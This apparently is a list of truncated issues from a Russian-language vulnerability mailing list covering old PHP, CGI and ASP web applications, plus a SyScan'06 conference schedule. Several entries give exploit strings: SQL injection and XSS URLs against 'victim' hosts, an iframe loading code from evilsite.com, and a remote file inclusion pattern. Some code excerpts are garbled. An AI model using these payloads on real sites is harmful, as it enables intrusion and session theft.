Компьютер для продвинутых пользователей В этом выпуске: CoolForum ПО: CoolForum Версия: 0.8.3 Уязвимость: В файле editpost.php найдены множественные уязвимости. Строка 38: if(isset_REQUEST'post) $post = intval_REQUEST'post); else $post = 0; Строка 77: $canedit = getrightedit_REQUEST'post_REQUEST'forumid); Использование: http://]/editpost.php?forumid=1...

Компьютер для продвинутых пользователей В этом выпуске: SCart ПО: SCart Версия: 2.0 Сайт: http://www.scartserver.com О SCart: Приложение для оплаты покупок в электронных магазинах. Уязвимость: В scart.cgi есть строки кода: . require 'scart.pl'; require '/home/scart/cgi-bin/2.0/scartserver.cgi'; . затем в scartserver.cgi в папке cgi-bin находим: . $HTML{TAB2} = $baseurl$cgiurl/?action=show_page&base=base2.html&page=browse.txt"; $HTML{TAB3} = $baseurl$cgiurl/?action=show_page&base=base3.html&page=specials.tx...

Компьютер для продвинутых пользователей В этом выпуске: MyBloggie ПО: MyBloggie Версия: 2.1.1. Использование: http://www.site.com/blog/admin.php?mybloggie_root_path[evil script] http://www.site.com/blog/scode.php?mybloggie_root_path[evil script] Рассылка создана и ведется при поддержке Информационной сети Пермского края . Меня можно найти: ICQ - 273214003 e-mail - isdmi1:mail.ru ...

Компьютер для продвинутых пользователей В этом выпуске: Pro Publish ПО: Pro Publish Сайт: http://www.deltascripts.com/download/ Использование: 1. SQL-инъекция: http://victim/propublish/cat.php?catid' 2. XSS: http://victim/propublish/art.php?artid><script>alert(/Soot/)</script> http://victim/propublish/cat.php?catname><script>alert(/Soot/)</script> Рассылка создана и ведется при поддержке Информационной сети Пермского края . Меня можно найти: ICQ - 273214003 e-mail - isdmi1:mail.ru ...

Компьютер для продвинутых пользователей В этом выпуске: PHP ManualMaker ПО: PHP ManualMaker Версия: 1.0 Использование: Введите в поля ввода или комментариев код: ><IMG SRC=javascript:alert(&#0000039XSS&#0000039)> XSS через URL: http://www.example.com/manualmaker/index.php?print=1&id=<iframe src=http://evilsite.com/evilcode.html Рассылка создана и ведется при поддержке Информационной сети Пермского края . Меня можно найти: ICQ - 273214003 e-mail - isdmi1:mail.ru ...

Компьютер для продвинутых пользователей В этом выпуске: Weblog Oggi ПО: Weblog Oggi Версия: 1.0 Использование: Пользовательский ввод не проверяется до выполнения. Что даёт возможность вставить в комментарии следующий код, который в последствии выполниться: Рассылка создана и ведется при поддержке Информационной сети Пермского края . Меня можно найти: ICQ - 273214003 e-mail - isdmi1:mail.ru ...

Компьютер для продвинутых пользователей Содержание: CAForum ПО: CAForum Версия: 1.0 О CAForum: CodeAvalanche FreeForum, написанное на asp приложение, который позволяет свободно общаться. Вам не нужно регистрироваться для посещения форума. Администратор может добавлять неограниченное количество тем. Уязвимость: В файле default.asp в директории Admin содержится уязвимость, которая позволяет провести удалённую SQL-инъекцию. Большинство людей получают права администратора через использование поля Пароль. Просм...

SyScan'06. SyScan'06 - The Hackers' Conference бедут проходить в Сингапуре с 20 по 21 июля 2006 года. Конференция собирается третий раз, и на этот раз будет длиться два дня. Расписание: День 1: 8:00 a.m. Регистрация 8:40 a.m. Приветственная речь - Thomas Lim 8:45 am Доклады Marc Maiffret - Chief Hacking Officer, eEye - Keynote Speech 9:30 a.m. Доклад Paul Craig - Unpacking Malware, Trojans and Worms 10:30 a.m. Перерыв 11:00 a.m. Доклад Thorsten Holz - Towards Automated Botnet Detection and Mitigation 12:30...

Компьютер для продвинутых пользователей Содержание: squirrelmail ПО: squirrelmail Версия: 1.4.х Уязвимость: Ошибка содердиться в functions/plugin.php. if (isset$plugins) && is_array$plugins) { foreach $plugins as $name) { use_plugin$name); } . function use_plugin $name) { if (file_exists(SM_PATH . "plugins/$name/setup.php) { include_once(SM_PATH . "plugins/$name/setup.php); $function = "squirrelmail_plugin_init$name"; if (function_exists$function) { $function); } } } . Если register_globals в положении on ...

Компьютер для продвинутых пользователей Содержание: TAL RateMyPic ПО: TAL RateMyPic Версия: 1.0 Сайт: http://www.dominioseuropa.com/index.php Использование: Введите в поля name, e-mail или комментарии следующий код: Так же возможно использовать URL: http://www.example.com/index.php?id= TAL RateMyPic Рассылка создана и ведется при поддержке Информационной сети Пермского края . Меня можно найти: ICQ - 273214003 e-mail - isdmi1:mail.ru ...